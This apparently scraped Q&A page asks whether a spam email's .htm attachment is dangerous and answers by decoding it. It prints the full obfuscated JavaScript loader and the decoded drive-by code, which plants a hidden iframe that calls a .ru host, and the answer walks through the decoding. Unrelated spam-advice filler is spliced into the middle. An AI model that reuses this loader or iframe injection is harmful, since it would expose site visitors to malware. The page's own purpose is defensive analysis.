Menu
I received a spam message that had a .htm attachment. I opened the file in gedit on my linux machine and saw the following. Does the script it would try to run do anything? It looks harmless, yet confusing.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait untill the page loads...</title>
</head>
<body>
<h1>Loading... Please Wait...</h1><br>
</body>`
<script>
if(window['doc'+'ume'+'nt'])
aa=/\w/.exec(new Date()).index+[];
aaa='0';
try {
new location();
}catch(qqq){
ss=String;
if(aa===aaa)
f='-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
.split('q');
md='a';
e=window['e'+'val'];
w=f;
s='';
fr='fromChar';
r=ss[fr+'Code'];
for(i=0;-i>-w.length;i+=1) {
j=i;
s=s+r(39+1*w[j]);
}
if(Math.round(-4*Math.tan(Math.atan(0.5)))===-2)
z=s;
e(z);
}
</script>
</html>
579
Spam emails are often used to disguise phishing attacks. If you engage with them, you could be putting your online accounts and identity at risk. Here's a guide on how to prevent phishing attacks. Regularly check your credit report and bank statements.
Your Recipients Marked Your Emails as Spam They may also have forgotten why they subscribed to your list in the first place, or simply made a mistake. Unfortunately, if enough of your messages get flagged by users, it can cause spam filters to flag your address and start sending your mail to spam automatically.
Spam is not a virus. However, some spam emails or messages may include phishing or malware (a form of virus) that can harm your device.
If you've noted a sudden increase in the number of spam emails landing in your account, there's a high chance that your address was part of a list recently sold to one or more scammers.
Encoded in f is the following code, which the script evals (executes):
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
I assume whatever lives on http://cparabnormapoopdsf.ru:8080 is evil and tries to exploit some kind of browser vulnerabilities.
I was able to extract f by basically copying what the script is doing:
var f = '-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
.split('q');
That gets you an array of numbers, which the script assembles into a string by adding 39 to each:
for (var i=0, s=''; i < f.length; i++) s+=String.fromCharCode(39+1*f[i]);
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
